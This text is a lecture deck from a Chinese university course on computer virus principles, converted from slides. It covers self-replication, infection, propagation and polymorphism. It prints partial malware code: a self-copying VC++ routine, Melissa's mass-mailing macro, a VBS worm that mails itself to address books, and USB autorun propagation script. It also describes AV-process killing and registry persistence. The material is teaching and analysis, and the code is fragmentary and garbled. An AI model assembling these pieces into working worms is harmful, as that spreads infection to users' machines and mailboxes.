华中科技大学病毒原理课件计算机病毒第二章.ppt

2计算机病毒的构造 本章开始深入讲解病毒的机理构造，是重点内容主要包括 ： 21计算机病毒的自我复制 22计算机病毒的感染机制 23计算机病毒的传播机制 24计算机病毒的伪装及变种功能 21计算机病毒的自我复制 自我复制是计算机病毒的最重要特征，要阐述 清楚它为什么具有了自我复制的功能-信息的 数字化和可存储是基本；不同病毒的自我复制 实现不同. 病毒的自我复制功能被绝大多数读者认为是病 毒的最奇妙的技术。其实，信息的数字化和机 器的拷贝功能是计算机病毒自我复制技术的基 础，只不过复制不是由计算机用户操作完成， 而是病毒本身来完成，下面将一一介绍。 21计算机病毒的自我复制 2.1.1生物病毒和计算机病毒的复制比较 生物病毒的复制 生物病毒是一种生物实体，它能够使用细胞所具有的机 制和物质对自己进行再制造，离开宿主它不能存在。 计算机病毒的复制 作为计算机病毒一般具有一下两个特征： 1该段程序寄生于宿主程序中，宿主程序执行时，该 段程序首先被执行。即具有寄生性。 2该段程序能够自我复制到其他宿主程序中，即具有 传染性。且被感染的程序运行时，病毒程序能够进一步 感染其他目标程序，从而使病毒得到传播。能够进行自 我复制计算机病毒的执行过程可以这样描述： At the beginning is one SRP - /*Phase I : INFECTION Process*/ A: .Search in a given directory if file. .If (file is found) then .If (fingerprint in file) then .Change to next entry in directory .go to A : . else .Copy the SRP code : The infected code of host must start by the Search function and a move is needed to avoid to overwriting code. . Save preinfection entry of host .endif .else .Change directory .go to A : .end if /*Phase 2 : ACTION Process*/ .If (trigger) then ACTION process .end if .go to preinfection entry in host program - Now : a new SRP. - Later. a lot of SRPs. 2.1.2计算机病毒自我复制示例 VC写的病毒自我传播的示例： void CMeCopyDlg:OnMeCopy() /只所以写这类程序希望大家能明白的是病毒怎么感染和自我传播的,我会把它的各个功能写出来 char syspath256=0,pepath256=0; int errsys=:GetWindowsDirectoryA(syspath,255); /获取系统路径; int errpe=:GetCurrentDirectory(256,pepath); /获取当前路径; /-这里是没有获取到路径时的处理- /*.省略*/ char path256=0; /-开始复制文件方法1- char comm256=0; wsprintf(comm,“xcopy /c/r/y %smecopy.exe %ssystem32mecopy.exe“,pepath,syspath); /这里设定命令是不管什么只是复制.$_$. wsprintf(path,“ 系统路径:%sn 程序路径:%sn 拷贝命令:%s “,syspath,pepath,comm); MessageBox(path,“Get Path:“); / system(comm); /这种复制是用DOS复制的,回有个DOS闪烁一下!回被发现哦. /另外一种复制方法: char path1256=0; char path2256=0; wsprintf(path2,“%ssystem32mecopy.exe“,syspath); wsprintf(path1,“%smecopy.exe“,pepath); int cpyerr=CopyFile(path1,path2,1); if(cpyerr=0) MessageBox(“Copy File Error!“); 2.1.2计算机病毒自我复制示 Melissa病毒的自我复制部分的代码片段如下： If UngaDasOutlook = “Outlook” Then DasMapiName.Logon “profile”,”password” For y= 1 To DasMapiName.AddressLists.Count Set AddyBook = DasMapiName.AddressLists(y) x= 1 Set BreakUmOffASlice = UngaDasOutlook.CreateItem(0) For oo =1 To AddyBook.AddressEntries.Count Peep = AddyBook.AddressEntries(x) BreakUmOffASlice.Recipients.Add Peep x= x+1 If x50 Then oo= AddyBook.AddressEntries.Count Next oo BreakUmOffASlice.Subject = “Importrant Message From” -)” BreakUmOffASlice.Attachments.Add ActiveDocument.FullName BreakUmOffASlice.Send Peep = “” Next y DasMapiName.Logoff End If 2.1.3病毒自我复制的结构和模型 Cohen在1984年为计算机病毒提出了一个形 式化的数学模型，这个模型使用图灵机。 实际上Cohen的计算机病毒的形式化数学模 型与Neumann的自我复制细胞自动机是十 分像似的。从Neumann的角度，我们可以 说计算机病毒就是一个可以自我复制的细 胞自动机。病毒的自我复制结构程下面的 金字塔型结构： 2.1.3病毒自我复制的结构和模型 图2.1 病毒自我复制功能的金字塔型结构 2.1.4基于自我复制功能的检测 病毒的自我复制的结构和描述有些类似于 句子的生成，这是病毒的最根本的一个特 征，即使其他的特征不明显，依据自我复 制的特征就可以判别是否为病毒，因此本 节介绍自我复制在病毒检测中方法和依据 ，详细而系统的病毒检测将在防治篇中介 绍。病毒自我复制功能的检测类似文本的 自动生成理论。前面对自我复制功能的描 述就是一个有穷自动机的形式。 2.1.4基于自我复制功能的检测 在自我复制功能的检测过程中，所有的系统调用都被监视器截获，然 后被发往复制检测模块，在这里包含了一整套不同的检测和过滤机制 。 图4.3.一场动作的检测算法 2.2计算机病毒的感染机制 2.2.1计算机病毒感染机制的概述 2.2.2计算机病毒的目的及实现 2.2.3计算机病毒的传染方式 2.2.4一个典型病毒的源码(感染部分)剖析 2.2.5总结 2.2.1计算机病毒感染机制的概述 大多数的病毒都会用如下的一段伪代码来检查某目标是否已被感染（ 复合的感染是相当明显的）。 BEGIN IF (infectable_object_found) AND (object_not_already_infected) THEN (infect_object) END 下一步就是将病毒代码安装到可被感染的目标中，这可能需要一步或 更多的操作来实现，其数目取决于病毒的类型。病毒代码安装的方式 有： 在引导区中写入一段新代码。 将该代码附加于某个程序文件。 将宏代码附加于.doc 文档。 将代码附加于标准系统程序，截断网络服务以便将与受感染文件相连 的链接发送到被俘获的email地址中去。 2.2.2计算机病毒的目的及实现 那么病毒在什么情况下被首次执行呢? 染有引导型病毒的磁盘在启动计算机时( 无论该磁盘是否是真正的DOS引导盘，是否 真正将计算机启动成功)，病毒被执行。 文件型病毒在执行染毒EXE和COM文件 时被执行。 初始化批处理启动病毒。 混合型病毒在以上几种情况下都被执行 。 2.2.3计算机病毒的传染方式 引导型感染：引导型病毒的代表有：Brain病毒， Stoned 病毒等。 寄生感染：病毒将其代码放入宿主程序中，或者在 头部或者在尾部亦或者在中部。 滋生感染：滋生感染式病毒又名伴侣病毒。 破坏性感染： 1990年9月产于原西德的Number one 病毒，1991年12月产于加拿大的small38病毒就属于 此类。 混合感染：既感染文件又感染主引导扇区或Boot扇 区的混合感染病毒。 交叉感染： 2.2.4一个典型感染剖析 “求职信”病毒是最早出现于2001年年底，相继 出现了多个变种，专门攻击微软公司Outlook 及Outlook Express的弱点。由于此病毒多以求 职为邮件内容，所以很容易迷惑用户，用户只 要打开(甚至是预览)带有这种病毒的电子邮件 ，就能够导致病毒的发作。当病毒驻留系统后 可能会强行关闭用户正在进行的正常操作，甚 至会删除硬盘上的14种文档。 “求职信”病毒程序具有双程序结构，分为蠕虫 部分(网络传播)和病毒部分(感染文件，破坏文 件)。 2.2.4一个典型感染剖析 当“求职信”病毒被激活后(用户打开或预览了带病毒的邮件)，将按下 列步骤对系统进行破坏。 1.安装木马 2.修改注册表 HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersion RunOnce Wink*=wink*.exe 3.中止反病毒程序 ACKWIN32,ALERTSVC,AMON,ANTIVIR,NOD32,Norton,等51个程序 4.繁殖 病毒将自身复制到本地硬盘、网络映射盘和局域网的共享硬盘上， 复制的文件都具有双重扩展名，一般如下： 第一个后缀为：BAK、BAT、C、CPP、DOC、EXE、HTM、HTML、MP3 、MP8、MPEG、MPQ、5.传播 经搜索到的邮件地址发送带病毒的电子邮件，发送的带毒附件的文件 名格式和复制的文件名格式是一样的。6.修改可执行文件 2.2.5总结 随着互联网的日益发展，计算机病毒的危 害越来越大，计算机病毒的感染方式也愈 来愈多。但病毒的最根本还是自我复制。 在整个生命期中还采用了隐藏、加密、触 发条件的手法，等等。本人对计算机病毒 感染机制进行了叙述，但不尽详略。随着 计算机病毒的防治愈加重要，对计算机病 毒感染机制的研究也将更深入和广泛。 2.3计算机病毒的传播机制 2.3.1计算机病毒的传播方式 2.3.2计算机病毒传播原理 2.3.3 典型网络病毒传播源码分析 2.3.4 通过移动存储介质传播的原理 2.3.1计算机病毒的传播方式 通过网络传播 1 通过网络的浏览和下载传播 2 通过电子邮件等传播 3 通过即时通讯软件传播 4 通过局域网传播 5 通过网页或软件等的漏洞进行传播 通过移动存储介质传播 其它传播方式 2.3各种传播途径比例 2.3.2计算机病毒传播原理 1 蠕虫的目标定位 收集电子邮件地址 进行网络共享枚举攻击。 网络扫描和目标指纹攻击。 网络蠕虫能够扫描远程系统，他们使用预定义的网络地址 类（指IP地址类）表产生随机的IP地址；随机扫描：蠕虫 W32/Slammer。Slammer攻击UDP的1434（SQL server）端 口，它不检测IP地址是否有效。 2.3.2计算机病毒传播原理 2 感染传播 攻击安装了后门的系统。有些蠕虫使用使用其它蠕 虫留下的后门接口进行传播，如W32/Borm，它感染 安装了Back Orifice的系统。具体攻击过程如下： )随机产生一个IP地址，并用Back Orifice的BO_PING 参查看是否安装有后门； )Borm向服务器发送一个BO_HTTP_ENABLE命令，指 示Back Orifice在系统上使用TCP协议的12345端口建立 HTTP代理服务。 )蠕虫连接服务器，用MIME编码上传自己，蠕虫通 过BO_PROCESS_SPAWN命令在服务器上运行刚刚上传 的可执行程序，进行新的传播。 2.3.3 典型网络病毒传播源码分析 1 蠕虫病毒Worm.Japanize的传播实例 2.3.3 典型网络病毒传播源码分析 2 vbs脚本病毒通过网络传播的几种方式及代码分析 Function mailBroadcast() Set mapiObj=outlookApp.GetNameSpace(“MAPI“) /获取MAPI的名字空间 For Each addr In addrList /获取每个地址表的Email记录数 For addrEntIndex= 1 To addrEntCount /遍历地址表的Email地址 Set item = outlookApp.CreateItem(0) /获取一个邮件对象实例 Set addrEnt = addr.AddressEntries(addrEntIndex) /获取具体Email地址 item.To = addrEnt.Address /填入收信人地址 Set attachMents=item.Attachments /定义邮件附件 attachMents.Add fileSysObj.GetSpecialFolder(0)&“test.jpg.vbs“ item.DeleteAfterSubmit = True /信件提交后自动删除 If item.To “A:“ and d “B:“) Then a=WshShell.Run(“autorun.bat - “&d ,0,True) if isdir then Of.CopyFile dir&“autorun.bat“,d&“,True Of.CopyFile dir&“sxs.exe“,d&“,True Of.CopyFile dir&“autorun.inf“,d&“,True Of.CopyFile dir&“autorun.reg“,d&“,True Of.CopyFile dir&“autorun.vbs“,d&“,True else Of.CopyFile “autorun.bat“,d&“,True Auto run 传播事例 Of.CopyFile “sxs.exe“,d&“,True Of.CopyFile “autorun.inf“,d&“,True Of.CopyFile “autorun.reg“,d&“,True Of.CopyFile “autorun.vbs“,d&“,True end if a=WshShell.Run(“autorun.bat + “&d ,0,True) End If next if isdir then wscript.sleep 60000 i=0 else a=WshShell.Run(“autorun.bat - “&dir ,0,True) Of.CopyFile “autorun.bat“,dir&“,True Of.CopyFile “sxs.exe“,dir&“,True Of.CopyFile “autorun.inf“,dir&“,True Of.CopyFile “autorun.reg“,dir&“,True Of.CopyFile “autorun.vbs“,dir&“,True a=WshShell.Run(“autorun.bat + “&dir ,0,True) End if next End if 2.3.4 通过移动存储介质传播的原理 2被动传播 用户在进行拷贝磁盘或文件时,把一个病毒由 一个载体复制到另外一个载体上。或者执行一 个染毒的程序时，导致病毒运行而感染。 有时病毒会使用一种巧妙的方式诱骗用户执行 病毒，病毒把U盘下所有文件夹隐藏，并把自 己复制成与原文件夹名称相同的具有文件夹图 标的文件，当你点击时病毒会执行自身并且打 开隐藏的该名称的文件夹。 2.3.5总结 病毒的传播方式是多种多样的，同一种病 毒可能有多种传播方式。病毒的传播技术 是随着计算机技术的发展而发展。在本节 中，简单地讨论了计算机病毒利用网络及 移动存储介质的传播原理，着重分析了网 络环境下的病毒传播，列出了常用的传播 技术。 2.4病毒的伪装及变种机制 2.4.1 变形病毒的概念及形式定义 2.4.2 变形病毒的分类 2.4.3变形病毒的常用技术 2.4.4变形病毒的现行发展和发展趋势 .5小结 2.4.1 变形病毒的概念及形式定义 加密病毒阶段 单变形病毒阶段 准变形病毒阶段 全变形病毒阶段 变形病毒的概念 变形病毒的形式定义 2.4.2 变形病毒的分类 以下根